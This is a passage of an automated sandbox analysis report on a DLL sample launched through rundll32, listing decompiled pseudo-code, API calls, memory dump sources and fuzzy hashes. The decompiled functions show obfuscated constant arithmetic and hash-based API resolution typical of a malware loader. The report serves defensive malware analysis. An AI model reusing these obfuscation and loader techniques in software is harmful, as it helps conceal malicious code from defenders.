				 *(_t271 + 0x20) = 0xb0d713;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
				 *(_t271 + 0x18) = 0xfc2615;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
				 *(_t271 + 0x4c) = 0x55d93;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
				 *(_t271 + 0x24) = 0xa7d31;
				_t239 = 0x67;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
				_t240 = 0x64;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
				 *(_t271 + 0x14) = 0x947781;
				_t241 = 0x11;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
				 *(_t271 + 0x2c) = 0x75c872;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
				_t242 = 0x74;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
				 *(_t271 + 0x10) = 0x81f543;
				_t149 = _t271 - 0x4c; // 0x10f16291
				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
				 *(_t271 + 0x3c) = 0x7405f8;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
				 *(_t271 + 0x34) = 0x5a2607;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
				 *(_t271 + 0x44) = 0xea1272;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
				_push( *(_t271 + 0x28));
				_push( *(_t271 + 0x1c));
				_push( *(_t271 + 0x50));
				_push( *(_t271 + 0x40));
				_t243 = 0x44;
				E00361310(_t243, _t149);
				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
				_t183 = _t271 - 0x4c; // 0x10f16291
				_t189 = _t271 - 8; // 0x10f162d5
				_t231 = E0035679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
				if(_t231 == 0) {
					_t232 = 0;
				} else {
					if(_t265 == 0) {
						E00354DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
						E00354DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t232 = 1;
				}
				return _t232;
			}

















                                                                                                                      0x00349701
                                                                                                                      0x0034970d
                                                                                                                      0x00349710
                                                                                                                      0x00349713
                                                                                                                      0x00349715
                                                                                                                      0x00349718
                                                                                                                      0x0034971b
                                                                                                                      0x0034971e
                                                                                                                      0x0034971f
                                                                                                                      0x00349722
                                                                                                                      0x00349724
                                                                                                                      0x00349727
                                                                                                                      0x00349728
                                                                                                                      0x00349729
                                                                                                                      0x0034972e
                                                                                                                      0x00349737
                                                                                                                      0x0034973b
                                                                                                                      0x0034973f
                                                                                                                      0x00349746
                                                                                                                      0x0034974d
                                                                                                                      0x00349754
                                                                                                                      0x0034975b
                                                                                                                      0x00349762
                                                                                                                      0x00349766
                                                                                                                      0x0034976d
                                                                                                                      0x0034977a
                                                                                                                      0x0034977d
                                                                                                                      0x00349780
                                                                                                                      0x00349787
                                                                                                                      0x0034978e
                                                                                                                      0x00349799
                                                                                                                      0x003497a3
                                                                                                                      0x003497a6
                                                                                                                      0x003497ad
                                                                                                                      0x003497b4
                                                                                                                      0x003497bb
                                                                                                                      0x003497c2
                                                                                                                      0x003497c9
                                                                                                                      0x003497d1
                                                                                                                      0x003497d2
                                                                                                                      0x003497d5
                                                                                                                      0x003497dc
                                                                                                                      0x003497e3
                                                                                                                      0x003497ea
                                                                                                                      0x003497f1
                                                                                                                      0x003497fc
                                                                                                                      0x003497ff
                                                                                                                      0x00349806
                                                                                                                      0x0034980d
                                                                                                                      0x00349819
                                                                                                                      0x0034981c
                                                                                                                      0x00349823
                                                                                                                      0x0034982a
                                                                                                                      0x00349831
                                                                                                                      0x00349838
                                                                                                                      0x0034983f
                                                                                                                      0x00349846
                                                                                                                      0x0034984d
                                                                                                                      0x00349854
                                                                                                                      0x0034985b
                                                                                                                      0x00349862
                                                                                                                      0x00349866
                                                                                                                      0x0034986d
                                                                                                                      0x00349874
                                                                                                                      0x0034987b
                                                                                                                      0x00349882
                                                                                                                      0x00349889
                                                                                                                      0x00349894
                                                                                                                      0x00349899
                                                                                                                      0x0034989d
                                                                                                                      0x003498a4
                                                                                                                      0x003498b0
                                                                                                                      0x003498b5
                                                                                                                      0x003498be
                                                                                                                      0x003498c1
                                                                                                                      0x003498c4
                                                                                                                      0x003498cb
                                                                                                                      0x003498d7
                                                                                                                      0x003498d8
                                                                                                                      0x003498dd
                                                                                                                      0x003498e4
                                                                                                                      0x003498f2
                                                                                                                      0x003498fb
                                                                                                                      0x003498fc
                                                                                                                      0x003498ff
                                                                                                                      0x00349906
                                                                                                                      0x00349912
                                                                                                                      0x00349915
                                                                                                                      0x00349918
                                                                                                                      0x0034991f
                                                                                                                      0x00349926
                                                                                                                      0x0034992d
                                                                                                                      0x00349934
                                                                                                                      0x0034993b
                                                                                                                      0x00349942
                                                                                                                      0x00349949
                                                                                                                      0x00349950
                                                                                                                      0x00349957
                                                                                                                      0x0034995e
                                                                                                                      0x00349965
                                                                                                                      0x0034996c
                                                                                                                      0x00349973
                                                                                                                      0x0034997a
                                                                                                                      0x00349981
                                                                                                                      0x00349984
                                                                                                                      0x00349987
                                                                                                                      0x0034998a
                                                                                                                      0x0034998f
                                                                                                                      0x00349990
                                                                                                                      0x00349998
                                                                                                                      0x0034999f
                                                                                                                      0x003499b6
                                                                                                                      0x003499cc
                                                                                                                      0x003499d6
                                                                                                                      0x00349a15
                                                                                                                      0x003499d8
                                                                                                                      0x003499da
                                                                                                                      0x003499f7
                                                                                                                      0x00349a0b
                                                                                                                      0x003499dc
                                                                                                                      0x003499df
                                                                                                                      0x003499e0
                                                                                                                      0x003499e1
                                                                                                                      0x003499e2
                                                                                                                      0x003499e2
                                                                                                                      0x003499e5
                                                                                                                      0x003499e5
                                                                                                                      0x00349a1d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: dcd23fe0be7efc1eff6f955ede261ea99024e41aa3b8c07a4caab150fb89552c
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 9CA1F172500248EFDF59CF64C94A9CE3BA2FF48348F119219FE199A260D3B6D995CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(003D78E8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(003D78E8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034EA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 34ea7b-34eb35 call 34cf25 call 342d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0034EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E0034CF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E00342D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x0034ea85
                                                                                                                      0x0034ea9a
                                                                                                                      0x0034ea9f
                                                                                                                      0x0034eaa9
                                                                                                                      0x0034eab2
                                                                                                                      0x0034eab9
                                                                                                                      0x0034eac0
                                                                                                                      0x0034eac7
                                                                                                                      0x0034ead3
                                                                                                                      0x0034ead8
                                                                                                                      0x0034eae0
                                                                                                                      0x0034eae8
                                                                                                                      0x0034eaeb
                                                                                                                      0x0034eaf2
                                                                                                                      0x0034eaf9
                                                                                                                      0x0034eb00
                                                                                                                      0x0034eb07
                                                                                                                      0x0034eb1f
                                                                                                                      0x0034eb2e
                                                                                                                      0x0034eb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0034EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 396da3b9aa43eee82df5c073776729c0c3548b45f1861fe5770312c0be90ba6c
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: ED119732D00208BBDB14DEE6C94A8DFBFB5EB85310F108099F514AA210E7715B64AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
